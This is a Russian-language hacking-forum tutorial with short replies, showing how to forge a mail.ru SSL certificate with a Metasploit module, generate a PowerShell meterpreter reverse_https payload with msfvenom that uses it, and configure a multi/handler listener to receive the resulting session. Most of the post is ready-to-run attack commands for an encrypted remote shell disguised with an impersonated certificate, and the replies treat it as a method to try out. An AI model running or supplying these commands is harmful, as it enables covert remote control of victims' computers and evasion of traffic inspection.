Статья Шифруем соединение или SSL сертификат в работе.

kot-gor

kot-gor

Grey Team
07.09.2016
523
686
Всем привет. Сегодня я покажу как можно с помощью подручных средств в кали линукс, создать защищенный канал между полезной нагрузкой и листенером.

На нашем форуме уже освещалась данная тематика, где Vander делал подробный обзор про замечательный инструмент Meterpreter Paranoid Mode.

Статья - Создание SSL сертификата. Meterpreter. MPM

Сегодня я покажу альтернативный способ, создания ssl соединения, только с помощью метасплойта. Мы рассмотрим:

  • создания поддельного сертификата
  • создадим полезную нагрузку PowerShell где будем использовать сертификат который сгенерировали ранее.
  • Создания и настройка листенера для работы с нашей полезной нагрузкой.
Для создания поддельного сертификата мы будем использовать модуль из метасплойта

auxiliary/gather/impersonate_ssl

Я буду генерировать сертификат mail.ru

Запускаем метасплойт пишем:

use auxiliary/gather/impersonate_ssl

set RHOST

run

1.png




По итогу как мы видим у нас создалось три файла.




2.png



Не плохой срок действия..)


3.png




Сейчас давайте создадим полезную нагрузку с нашим сгенерированным сертификатом.

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.108 LPORT=4444 PayloadUUIDTracking=true HandlerSSLCert=/root/ StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o 4444.bat


41.png



Далее создаём листенер который позволит нам принять данные с нашей полезной нагрузки для этого нам нужно добавить 2 две строчки, а именно:

set HandlerSSLCert /root/ (путь где файл сертификата)

set StagerVerifySSLCert true

полностью это будет выглядеть следующим образом.

use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.0.108
set LPORT 4444
set HandlerSSLCert /root/
set StagerVerifySSLCert true
exploit -j




Так как у меня белый IP через роутер ,листенер на картинке будет немного отличаться.


5.png


По итогу получаем заветную сессию с проверкой сертификата SSL

На этом всё, спасибо за внимание.
 
Последнее редактирование:
Vertigo

Vertigo

Lex mea est Vulgate Linux
Gold Team
15.02.2017
1 182
3 497
Топчик , Бро. Очень важная иредкая тема ,пусть ещё побудет навиду ). Спасибо за труд.
 
D

Demi

Mod. Ethical Hacking
Grey Team
16.02.2017
145
133
Пусть недельку повесит !
 
☠xrahitel☠

☠xrahitel☠

Green Team
09.12.2016
170
274
в чем отличие
 
kot-gor

kot-gor

Grey Team
07.09.2016
523
686
ни чем, метод распространенный, поэтому не удивительно, что им пользуются многие.. я всего лишь описал его на нашем форуме, как альтернативу создания ssl.
 
  • Нравится
Реакции: gushmazuko и n01n02h
S

StaxIoT

Member
17.05.2018
18
6
Спасибо больше, добавил в закладки - вечером попробуемс.. :)
 
  • Нравится
Реакции: Vertigo
H

hoka

New member
02.06.2019
2
0
Блин че за ерунда, где я все ошбиаюсь, второй день запустить не могу
 
Мы в соцсетях: